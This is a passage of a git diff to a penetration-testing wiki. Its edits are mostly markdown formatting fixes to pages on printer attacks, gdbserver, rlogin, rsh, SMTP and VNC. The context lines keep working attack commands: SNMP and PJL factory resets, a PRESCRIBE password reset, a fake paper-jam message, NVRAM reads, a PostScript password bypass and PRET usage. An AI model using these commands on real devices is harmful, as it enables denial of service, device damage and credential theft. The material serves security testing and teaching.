 If the printer is **authorising people using an external LDAP**. If you have access to the **change this settings** (maybe using a web console interface) you can make the printer connects to your LDAP server and authorise any user.\
-Note that you could abuse this settings also to** steal the credentials the printer is using** to connect to the LDAP server. [Read here to learn more](../../windows/active-directory-methodology/ad-information-in-printers.md).
+Note that you could abuse this settings also to **steal the credentials the printer is using** to connect to the LDAP server. [Read here to learn more](../../windows/active-directory-methodology/ad-information-in-printers.md).
 
 ## Brute-Force
 
@@ -44,7 +44,7 @@ Disk lock:       OFF
 
 ### PostScript
 
-PostScript offers two types of passwords: The` SystemParamsPassword` is used to change print job settings like paper size, while the `StartJobPassword` is required to exit the server loop and therefore permanently alter the PostScript environment.
+PostScript offers two types of passwords: The `SystemParamsPassword` is used to change print job settings like paper size, while the `StartJobPassword` is required to exit the server loop and therefore permanently alter the PostScript environment.
 
 Brute-force attacks against PostScript passwords can be performed extremely fast because the **PostScript interpreter can be programmed to literally crack itself**:
 
@@ -64,7 +64,7 @@ Another approach is to **bypass PostScript passwords** by resetting them with Ad
 } 1183615869 internaldict /superexec get exec
 ```
 
-The lock and unlock commands of [PRET](https://github.com/RUB-NDS/PRET) can be used to test **brute-force** attacks against numeric (integer) PostScript passwords or to **bypass **them with **superexec magic**:
+The lock and unlock commands of [PRET](https://github.com/RUB-NDS/PRET) can be used to test **brute-force** attacks against numeric (integer) PostScript passwords or to **bypass** them with **superexec magic**:
 
 ```
 ./pret.py -q printer ps
@@ -83,4 +83,4 @@ Device unlocked with password: 0
 
 
 
-**More information about Password Disclosure and Brute-Force in **[**http://hacking-printers.net/wiki/index.php/Credential_disclosure**](http://hacking-printers.net/wiki/index.php/Credential_disclosure)****
+**More information about Password Disclosure and Brute-Force in** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential\_disclosure)****
diff --git a/pentesting/pentesting-printers/cross-site-printing.md b/pentesting/pentesting-printers/cross-site-printing.md
index 89b6b90d..0b346318 100644
--- a/pentesting/pentesting-printers/cross-site-printing.md
+++ b/pentesting/pentesting-printers/cross-site-printing.md
@@ -6,11 +6,11 @@ description: >-
 
 # Cross-Site Printing
 
-You can make a user send HTTP POST request to the port 9100 of several IPs trying to reach an open raw print port open. If found, the **HTTP header is either printed as plain text or discarded** based on the printer's settings. The **POST data **however can **contain **arbitrary print jobs like **PostScript **or **PJL **commands to be **interpreted**.
+You can make a user send HTTP POST request to the port 9100 of several IPs trying to reach an open raw print port open. If found, the **HTTP header is either printed as plain text or discarded** based on the printer's settings. The **POST data** however can **contain** arbitrary print jobs like **PostScript** or **PJL** commands to be **interpreted**.
 
 #### Enhanced cross-site printing
 
-You can use XMLHttpRequest (XHR) JavaScript objects as defined in to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that **data can only be sent to the device**, **not received** because of the same-origin policy. To **bend **the **restrictions **of the same-origin policy, you can **make **the **server **responds with a fake but **valid HTTP response **allowing CORS requests (including `Access-Control-Allow-Origin=*` ). A schematic overview of the attack is given below:
+You can use XMLHttpRequest (XHR) JavaScript objects as defined in to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that **data can only be sent to the device**, **not received** because of the same-origin policy. To **bend** the **restrictions** of the same-origin policy, you can **make** the **server** responds with a fake but **valid HTTP response** allowing CORS requests (including `Access-Control-Allow-Origin=*` ). A schematic overview of the attack is given below:
 
 ![Advanced cross-site printing with CORS spoofing](http://hacking-printers.net/wiki/images/thumb/c/ce/Cross-site-printing.png/900px-Cross-site-printing.png)
 
@@ -41,9 +41,9 @@ x.onreadystatechange = function() {
 
 #### Limitations of cross-site printing
 
-Note that **PCL **as page description language is **not applicable for CORS spoofing** because it only allows one **single number **to be **echoed**. **PJL likewise cannot **be used because unfortunately it prepends `@PJL ECHO` to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does **not **mean that **enhanced XSP attacks **are **limited **to **PostScript **jobs: PostScript can be used to respond with a spoofed HTTP header and **the **[**UEL **](./#uel)**can further be invoked to switch the printer language**. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct `Content-Length` for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the `Connection: close` header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time.
+Note that **PCL** as page description language is **not applicable for CORS spoofing** because it only allows one **single number** to be **echoed**. **PJL likewise cannot** be used because unfortunately it prepends `@PJL ECHO` to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does **not** mean that **enhanced XSP attacks** are **limited** to **PostScript** jobs: PostScript can be used to respond with a spoofed HTTP header and **the** [**UEL** ](./#uel)**can further be invoked to switch the printer language**. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct `Content-Length` for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the `Connection: close` header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time.
 
-**If **the printer device supports **plain** **text printing **the **HTTP request **header of the XHR is printed out as hard copy – including the `Origin` header field containing the URL that invoked the malicious JavaScript, thus making it **hard **for an attacker to **stay silent**. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however **try to first disable printing functionality** with proprietary PJL commands as proposed in [PJL jobmedia](http://hacking-printers.net/wiki/index.php/Document_processing#PJL_jobmedia) using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting they have some drawbacks beyond not providing feedback using spoofed CORS headers:
+**If** the printer device supports **plain** **text printing** the **HTTP request** header of the XHR is printed out as hard copy – including the `Origin` header field containing the URL that invoked the malicious JavaScript, thus making it **hard** for an attacker to **stay silent**. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however **try to first disable printing functionality** with proprietary PJL commands as proposed in [PJL jobmedia](http://hacking-printers.net/wiki/index.php/Document\_processing#PJL\_jobmedia) using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting they have some drawbacks beyond not providing feedback using spoofed CORS headers:
 
 * Cross-protocol access to LPD and FTP ports is blocked by various web browsers
 * Parameters for direct printing over the embedded web server are model-specific
@@ -59,7 +59,7 @@ A comparison of cross-site printing channels is given in below:
 | LPD     | 515  | ✔           | -                     | ✔            | FF, Ch, Op     |
 | FTP     | 21   | ✔           | -                     | ✔            | FF, Ch, Op, IE |
 
-One major problem of XSP is to **find **out the **correct address **or hostname of the **printer**. Our approach is to** abuse WebRTC** which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port** 9100/tcp** for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before.
+One major problem of XSP is to **find** out the **correct address** or hostname of the **printer**. Our approach is to **abuse WebRTC** which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port **9100/tcp** for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before.
 
 ### Proof-of-concept
 
diff --git a/pentesting/pentesting-printers/document-processing.md b/pentesting/pentesting-printers/document-processing.md
index 08744e61..dbf5b59e 100644
--- a/pentesting/pentesting-printers/document-processing.md
+++ b/pentesting/pentesting-printers/document-processing.md
@@ -70,7 +70,7 @@ Printing functionality: OFF
 
 ### Offline mode
 
-In addition, the PJL standard defines the` OPMSG` command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:
+In addition, the PJL standard defines the `OPMSG` command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:
 
 ```
 @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"
@@ -89,4 +89,4 @@ from printing or re-connecting to the device. Press CTRL+C to abort.
 Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
 ```
 
-**Learn more about these attacks in **[**http://hacking-printers.net/wiki/index.php/Document_processing**](http://hacking-printers.net/wiki/index.php/Document_processing)****
+**Learn more about these attacks in** [**http://hacking-printers.net/wiki/index.php/Document\_processing**](http://hacking-printers.net/wiki/index.php/Document\_processing)****
diff --git a/pentesting/pentesting-printers/factory-defaults.md b/pentesting/pentesting-printers/factory-defaults.md
index 3ff30ff6..28891e6b 100644
--- a/pentesting/pentesting-printers/factory-defaults.md
+++ b/pentesting/pentesting-printers/factory-defaults.md
@@ -4,13 +4,13 @@ description: From http://hacking-printers.net/wiki/index.php/Factory_defaults
 
 # Factory Defaults
 
-**Resetting **a device to factory defaults is a security-critical functionality as it **overwrites protection mechanisms **like user-set passwords. This can usually be done by pressing a** special key combination** on the printer's **control panel**. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, **physical access** to the device is **not always an option**.
+**Resetting** a device to factory defaults is a security-critical functionality as it **overwrites protection mechanisms** like user-set passwords. This can usually be done by pressing a **special key combination** on the printer's **control panel**. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, **physical access** to the device is **not always an option**.
 
 #### SNMP
 
-The Printer-MIB defines the **prtGeneralReset **Object (**OID 1.3.6.1.2.1.43.5.1.1.3.1**) which allows an attacker to restart the device (powerCycleReset(4)), reset the NVRAM settings (resetToNVRAM(5)) or restore factory defaults (resetToFactoryDefaults(6)) using SNMP. This feature/attack is **supported by a large variety of printers** and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all **static IP address configuration will be lost**. **If no DHCP** service is available, the attacker will **not **be able to **reconnect **to the device anymore after resetting it to factory defaults.
+The Printer-MIB defines the **prtGeneralReset** Object (**OID 1.3.6.1.2.1.43.5.1.1.3.1**) which allows an attacker to restart the device (powerCycleReset(4)), reset the NVRAM settings (resetToNVRAM(5)) or restore factory defaults (resetToFactoryDefaults(6)) using SNMP. This feature/attack is **supported by a large variety of printers** and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all **static IP address configuration will be lost**. **If no DHCP** service is available, the attacker will **not** be able to **reconnect** to the device anymore after resetting it to factory defaults.
 
-**Resetting the device to factory default** can be accomplished using `snmpset `command as shown below (you need to know the **community string**, by default in most cases is `public`):
+**Resetting the device to factory default** can be accomplished using `snmpset` command as shown below (you need to know the **community string**, by default in most cases is `public`):
 
 ```bash
 snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6
@@ -18,7 +18,7 @@ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6
 
 #### [PML](./#pml)/[PJL](./#pjl)
 
-In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On **HP devices **however, **SNMP **can be transformed into its **PML representation** and embed the request within a legitimate print job. This allows an attacker to **restart and/or reset the device** to factory defaults within ordinary print jobs as shown below:
+In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On **HP devices** however, **SNMP** can be transformed into its **PML representation** and embed the request within a legitimate print job. This allows an attacker to **restart and/or reset the device** to factory defaults within ordinary print jobs as shown below:
 
 ```bash
 @PJL DMCMD ASCIIHEX="040006020501010301040106"
@@ -37,8 +37,8 @@ printer:/> restart
 
 #### PostScript
 
-PostScript offers a similar feature: The **FactoryDefaults **system parameter, ‘a flag that, if **set to true** **immediately before **the **printer is turned off**, causes all nonvolatile parameters to revert to their **factory default **values at the next power-on’. It must be noted that **PostScript **itself also has the capability to **restart **its **environment **but it requires a **valid password**. \
-The PostScript interpreter however can be put into an **infinite loop** as discussed in [document processing](http://hacking-printers.net/wiki/index.php/Document_processing) DoS attacks which forces the user to **manually restart** the device and thus reset the PostScript password.
+PostScript offers a similar feature: The **FactoryDefaults** system parameter, ‘a flag that, if **set to true** **immediately before** the **printer is turned off**, causes all nonvolatile parameters to revert to their **factory default** values at the next power-on’. It must be noted that **PostScript** itself also has the capability to **restart** its **environment** but it requires a **valid password**. \
+The PostScript interpreter however can be put into an **infinite loop** as discussed in [document processing](http://hacking-printers.net/wiki/index.php/Document\_processing) DoS attacks which forces the user to **manually restart** the device and thus reset the PostScript password.
 
 Reset PostScript system parameters to factory defaults:
 
@@ -65,7 +65,7 @@ printer:/> restart
 
 #### PRESCRIBE
 
-For **Kyocera devices**, the **PRESCRIBE page **description languages may be used to **reset the device** to factory default from within ordinary print jobs using one of the commands shown below:
+For **Kyocera devices**, the **PRESCRIBE page** description languages may be used to **reset the device** to factory default from within ordinary print jobs using one of the commands shown below:
 
 ```bash
 !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'";  CMMT "Drop the security level, reset password";
diff --git a/pentesting/pentesting-printers/file-system-access.md b/pentesting/pentesting-printers/file-system-access.md
index e51df730..cac7110e 100644
--- a/pentesting/pentesting-printers/file-system-access.md
+++ b/pentesting/pentesting-printers/file-system-access.md
@@ -2,7 +2,7 @@
 
 ### **PostScript**
 
-Retrieve sensitive information like configuration files or stored print jobs, RCE by writting files (like editing rc scripts or replacing binary files).  Legitimate language constructs are defined for **PostScript **and **PJL **to **access the filesystem**.
+Retrieve sensitive information like configuration files or stored print jobs, RCE by writting files (like editing rc scripts or replacing binary files).  Legitimate language constructs are defined for **PostScript** and **PJL** to **access the filesystem**.
 
 Access the file system with PostScript (note that it could be sandboxed limiting to harmless actions):
 
@@ -84,4 +84,4 @@ d        -   webServer
 d        -   xps
 ```
 
-**Learn more about possible sandbox bypasses using PostScript and PJL limitations in **[**http://hacking-printers.net/wiki/index.php/File_system_access**](http://hacking-printers.net/wiki/index.php/File_system_access)****
+**Learn more about possible sandbox bypasses using PostScript and PJL limitations in** [**http://hacking-printers.net/wiki/index.php/File\_system\_access**](http://hacking-printers.net/wiki/index.php/File\_system\_access)****
diff --git a/pentesting/pentesting-printers/memory-access.md b/pentesting/pentesting-printers/memory-access.md
index 98f5b57c..0d39f2c3 100644
--- a/pentesting/pentesting-printers/memory-access.md
+++ b/pentesting/pentesting-printers/memory-access.md
@@ -2,7 +2,7 @@
 
 **You can try to dump the NVRAM and extract confidential info (as passwords) from there.**
 
-In **PJL (Brother)** you can access **arbitrary NVRAM addresses **using PJL as shown below:
+In **PJL (Brother)** you can access **arbitrary NVRAM addresses** using PJL as shown below:
 
 ```bash
 @PJL RNVRAM ADDRESS = X              # read byte at location X
@@ -24,7 +24,7 @@ Writing copy to nvram/printer
 ................................................................................
 ```
 
-Certain** Xerox printer models** have a proprietary **PostScript **`vxmemfetch` operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory as show below (PRET doesn't have this attack so you will need to send this payload to the port 9100 in a `nc` connection):
+Certain **Xerox printer models** have a proprietary **PostScript** `vxmemfetch` operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory as show below (PRET doesn't have this attack so you will need to send this payload to the port 9100 in a `nc` connection):
 
 ```
 /counter 0 def 50000 {
@@ -34,4 +34,4 @@ Certain** Xerox printer models** have a proprietary **PostScript **`vxmemfetch`
 } repeat
 ```
 
-**More information here: **[**http://hacking-printers.net/wiki/index.php/Memory_access**](http://hacking-printers.net/wiki/index.php/Memory_access)****
+**More information here:** [**http://hacking-printers.net/wiki/index.php/Memory\_access**](http://hacking-printers.net/wiki/index.php/Memory\_access)****
diff --git a/pentesting/pentesting-printers/physical-damage.md b/pentesting/pentesting-printers/physical-damage.md
index fc89a16c..e28566e0 100644
--- a/pentesting/pentesting-printers/physical-damage.md
+++ b/pentesting/pentesting-printers/physical-damage.md
@@ -1,6 +1,6 @@
 # Physical Damage
 
- Long-term settings for printers and other embedded devices are stored in non-volatile memory ([NVRAM](https://en.wikipedia.org/wiki/Non-volatile_random-access_memory)) which is traditionally implemented either as [EEPROM](https://en.wikipedia.org/wiki/EEPROM) or as [flash memory](https://en.wikipedia.org/wiki/Flash_memory). Both components have a limited lifetime. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur.
+&#x20;Long-term settings for printers and other embedded devices are stored in non-volatile memory ([NVRAM](https://en.wikipedia.org/wiki/Non-volatile\_random-access\_memory)) which is traditionally implemented either as [EEPROM](https://en.wikipedia.org/wiki/EEPROM) or as [flash memory](https://en.wikipedia.org/wiki/Flash\_memory). Both components have a limited lifetime. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur.
 
 ### PJL
 
@@ -42,4 +42,4 @@ PostScript can run a script that corrupts its own NVRAM:
 } loop
 ```
 
-**More information about these techniques can be found in **[**http://hacking-printers.net/wiki/index.php/Physical_damage**](http://hacking-printers.net/wiki/index.php/Physical_damage)****
+**More information about these techniques can be found in** [**http://hacking-printers.net/wiki/index.php/Physical\_damage**](http://hacking-printers.net/wiki/index.php/Physical\_damage)****
diff --git a/pentesting/pentesting-printers/print-job-manipulation.md b/pentesting/pentesting-printers/print-job-manipulation.md
index 768edf75..a0a49639 100644
--- a/pentesting/pentesting-printers/print-job-manipulation.md
+++ b/pentesting/pentesting-printers/print-job-manipulation.md
@@ -6,17 +6,17 @@ description: From http://hacking-printers.net/wiki/index.php/Print_job_manipulat
 
 ## Content Overlay
 
-One simple way to manipulate the appearance of printouts is to **use **overlays. \
+One simple way to manipulate the appearance of printouts is to **use** overlays. \
 [**PCL**](./#pcl) has a documented function to put **overlay macros** on top of a document. Unfortunately, this feature is **limited to the current print job** and cannot be made permanent. \
-[**PostScript **](./#postscript-ps)does not offer such functionality by default, however it can be programmed into by **redefining the showpage** operator which is contained in every PostScript document to print the current page. The attacker can **hook in there**, execute her own code and then call the original version of the operator.\
+[**PostScript** ](./#postscript-ps)does not offer such functionality by default, however it can be programmed into by **redefining the showpage** operator which is contained in every PostScript document to print the current page. The attacker can **hook in there**, execute her own code and then call the original version of the operator.\
 Therefore she can overlay all pages to be printed with a custom EPS file. This hack can be used to **add arbitrary graphics or fonts to hard copies of a document** (It is possible to completely alter the appearance of a document by overlaying a blank page and then adding custom content).\
-Obviously, such an approach can only be successful if PostScript is used as printer driver and no `StartJobPassword `is set.
+Obviously, such an approach can only be successful if PostScript is used as printer driver and no `StartJobPassword` is set.
 
 ![](http://hacking-printers.net/wiki/images/thumb/9/93/Overlay.jpg/300px-Overlay.jpg)
 
 **How to test for this attack?**
 
-Use [**PRET**](https://github.com/RUB-NDS/PRET)'s `cross` or `overlay `commands in ps mode, then disconnect and print an arbitrary document:
+Use [**PRET**](https://github.com/RUB-NDS/PRET)'s `cross` or `overlay` commands in ps mode, then disconnect and print an arbitrary document:
 
 ```
 ./pret.py -q printer ps
@@ -31,9 +31,9 @@ printer:/> exit
 ## Content Replacement
 
 Even if an attacker can put an overlay above existing documents, she will not be able to **alter specific values** in the original document unless its exact structure is known. Sometimes ones does not only want to add custom content, but to **parse and replace parts** of the existing document. \
-The problem of replacing text in PostScript files can be reduced to the** problem of extracting strings** from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option.\
-You can use  a **redefined `show `operator**. The show operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, **text** can elegantly be **extracted**. This approach can also be used for targeted **searching and replacing** in strings immediately **before **they are **painted**. \
-The approach is **successful **for **LaTeX **based PostScript documents which are directly sent to the printer while it **fails **for PostScript files generated by **GIMP **which instead of strings **creates raster graphics** of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed and should be subject of further research.
+The problem of replacing text in PostScript files can be reduced to the **problem of extracting strings** from the rendered document. This is not trivial, because strings can be dynamically built by the PostScript program itself. Hence, simple parsing and replacing within the document source code is not an option.\
+You can use  a **redefined `show` operator**. The show operator accepts a string as input, which is painted to a certain location of the current page. By redefining the operator, **text** can elegantly be **extracted**. This approach can also be used for targeted **searching and replacing** in strings immediately **before** they are **painted**. \
+The approach is **successful** for **LaTeX** based PostScript documents which are directly sent to the printer while it **fails** for PostScript files generated by **GIMP** which instead of strings **creates raster graphics** of their representation. The same issue occurs for any document format – even PostScript itself – when processed by CUPS. Theoretically such language constructs could also be parsed and should be subject of further research.
 
 **How to test for this attack?**
 
diff --git a/pentesting/pentesting-printers/print-job-retention.md b/pentesting/pentesting-printers/print-job-retention.md
index c4e69226..d93663a9 100644
--- a/pentesting/pentesting-printers/print-job-retention.md
+++ b/pentesting/pentesting-printers/print-job-retention.md
@@ -21,7 +21,7 @@ Hold jobs are kept in memory and can be reprinted from the printer's control pan
 
 **How to test for this attack?**
 
-Use `hold`command from [**PRET **](https://github.com/RUB-NDS/PRET)in pjl mode and to check if permanent job retention can be set:
+Use `hold`command from [**PRET** ](https://github.com/RUB-NDS/PRET)in pjl mode and to check if permanent job retention can be set:
 
 ```
 ./pret.py -q printer pjl
@@ -46,7 +46,7 @@ While it is theoretically possible to permanently enable PostScript job retentio
 
 **How to test for this attack?**
 
-Use `hold`command from [**PRET **](https://github.com/RUB-NDS/PRET) in ps mode:
+Use `hold`command from [**PRET** ](https://github.com/RUB-NDS/PRET) in ps mode:
 
 ```
 ./pret.py -q printer ps
@@ -63,7 +63,7 @@ It is possible but uncommon to activate job retention in the printing dialog as
 
 ### PostScript
 
-With the capability to hook into arbitrary PostScript operators it is possible to manipulate and access foreign print jobs. To **parse the actual datastream send to the printer**, one can apply a pretty cool feature of the PostScript language: to read its own program code as data using the `currentfile` operator. This way, the whole datastream to be processed by the PostScript interpreter can be accessed by reading and stored to a file on the printer device. If the printer does not offer file system access,** captured documents can be stored in memory**, for example within permanent PostScript dictionaries. \
+With the capability to hook into arbitrary PostScript operators it is possible to manipulate and access foreign print jobs. To **parse the actual datastream send to the printer**, one can apply a pretty cool feature of the PostScript language: to read its own program code as data using the `currentfile` operator. This way, the whole datastream to be processed by the PostScript interpreter can be accessed by reading and stored to a file on the printer device. If the printer does not offer file system access, **captured documents can be stored in memory**, for example within permanent PostScript dictionaries. \
 One practical problem is to decide **which operator should be hooked** as one does not gain access to the datastream until this operator is processed by the PostScript interpreter. As an attacker wants to capture print jobs from the very beginning, the **redefined operator must be the very first operator** contained in the PostScript document. Fortunately all documents printed with CUPS are pressed into a fixed structure beginning with `currentfile /ASCII85Decode filter /LZWDecode filter cvx exec`. Based on the assumption of such a fixed structure, the attacker can capture documents from the beginning and execute (aka print) the file afterwards. For printing systems **other than CUPS** this attack should also be possible, but **operators need to be adapted**. Note that the PostScript header which usually includes media size, user and job names cannot be captured using this method because we first hook into at the beginning of the actual document. Another generic strategy to hook into at the beginning of every print job is to set the `BeginPage` system parameter, if supported by the printer (most printer do). This vulnerability has presumably been present in printing devices for decades as solely language constructs defined by the PostScript standard are abused.
 
 Use `capture` command from [**PRET**](https://github.com/RUB-NDS/PRET) in ps mode:
diff --git a/pentesting/pentesting-printers/transmission-channel.md b/pentesting/pentesting-printers/transmission-channel.md
index ba2f2c27..cdda1cbf 100644
--- a/pentesting/pentesting-printers/transmission-channel.md
+++ b/pentesting/pentesting-printers/transmission-channel.md
@@ -1,6 +1,6 @@
 # Transmission channel
 
-If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. 
+If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing.&#x20;
 
 Basic DoS:
 
@@ -34,4 +34,4 @@ TIMEOUT=15 [2 RANGE]
 While the PJL reference specifies a maximum timeout of 300 seconds, in practice maximum PJL timeouts may range from 15 to 2147483 seconds.\
 Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open.
 
-**Learn more about this attack in **[**http://hacking-printers.net/wiki/index.php/Transmission_channel**](http://hacking-printers.net/wiki/index.php/Transmission_channel)****
+**Learn more about this attack in** [**http://hacking-printers.net/wiki/index.php/Transmission\_channel**](http://hacking-printers.net/wiki/index.php/Transmission\_channel)****
diff --git a/pentesting/pentesting-remote-gdbserver.md b/pentesting/pentesting-remote-gdbserver.md
index 7c1b4494..5b3942f6 100644
--- a/pentesting/pentesting-remote-gdbserver.md
+++ b/pentesting/pentesting-remote-gdbserver.md
@@ -4,7 +4,7 @@
 
 **gdbserver** is a computer program that makes it possible to remotely debug other programs. Running on the same system as the program to be debugged, it allows the **GNU Debugger to connect from another system**; that is, only the executable to be debugged needs to be resident on the target system ("target"), while the source code and a copy of the binary file to be debugged reside on the developer's local computer ("host"). The connection can be either TCP or a serial line.
 
-You can make a **gdbserver listen in any port** and at the moment** nmap is not capable of recognising the service**.
+You can make a **gdbserver listen in any port** and at the moment **nmap is not capable of recognising the service**.
 
 ## Exploitation
 
@@ -37,7 +37,7 @@ run
 
 ### Execute arbitrary commands
 
-There is another way to **make the debugger execute arbitrary commands via a python custom script taken from **[**here**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)**.**
+There is another way to **make the debugger execute arbitrary commands via a python custom script taken from** [**here**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)**.**
 
 ```bash
 # Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
diff --git a/pentesting/pentesting-rlogin.md b/pentesting/pentesting-rlogin.md
index 968f9765..0e7e3666 100644
--- a/pentesting/pentesting-rlogin.md
+++ b/pentesting/pentesting-rlogin.md
@@ -4,7 +4,7 @@
 
 This service was mostly used in the old days for remote administration but now because of security issues this service has been replaced by the slogin and the ssh.
 
-**Default port: **513
+**Default port:** 513
 
 ```
 PORT    STATE SERVICE
@@ -17,7 +17,7 @@ PORT    STATE SERVICE
 apt-get install rsh-client
 ```
 
-This command will try to **login **to the remote host by using the login name **root **(for this service **you don't need to know any password**):
+This command will try to **login** to the remote host by using the login name **root** (for this service **you don't need to know any password**):
 
 ```
 rlogin <IP> -l <username>
diff --git a/pentesting/pentesting-rsh.md b/pentesting/pentesting-rsh.md
index 59c91a76..9e8d9e62 100644
--- a/pentesting/pentesting-rsh.md
+++ b/pentesting/pentesting-rsh.md
@@ -2,7 +2,7 @@
 
 ## Basic Information
 
-**Rsh **use **.rhosts** files and **/etc/hosts.equiv** for authentication. These methods relied on IP addresses and DNS (Domain Name System) for authentication. However, spoofing IP addresses is fairly easy, especially if the attacker is on the local network.
+**Rsh** use **.rhosts** files and **/etc/hosts.equiv** for authentication. These methods relied on IP addresses and DNS (Domain Name System) for authentication. However, spoofing IP addresses is fairly easy, especially if the attacker is on the local network.
 
 Furthermore, the **.rhosts** files were stored in users' home directories, which were typically stored on NFS (Network File System) volumes. (from here: [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)).
 
diff --git a/pentesting/pentesting-smtp/smtp-commands.md b/pentesting/pentesting-smtp/smtp-commands.md
index 83f86b3d..d71fc43a 100644
--- a/pentesting/pentesting-smtp/smtp-commands.md
+++ b/pentesting/pentesting-smtp/smtp-commands.md
@@ -1,6 +1,6 @@
 # SMTP - Commands
 
-**Extracted from: **[**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)****
+**Extracted from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)****
 
 **HELO**\
 It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.
diff --git a/pentesting/pentesting-vnc.md b/pentesting/pentesting-vnc.md
index d0a1a1bd..b64c3144 100644
--- a/pentesting/pentesting-vnc.md
+++ b/pentesting/pentesting-vnc.md
@@ -3,7 +3,7 @@
 ## Basic Information
 
 In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network. \
-From [wikipedia](https://en.wikipedia.org/wiki/Virtual_Network_Computing).
+From [wikipedia](https://en.wikipedia.org/wiki/Virtual\_Network\_Computing).
 
 VNC usually uses ports **5800 or 5801 or 5900 or 5901.**
 
@@ -29,7 +29,7 @@ vncviewer [-passwd passwd.txt] <IP>::5901
 
 ## Decrypting VNC password
 
-Default **password is stored **in: \~/.vnc/passwd
+Default **password is stored** in: \~/.vnc/passwd
 
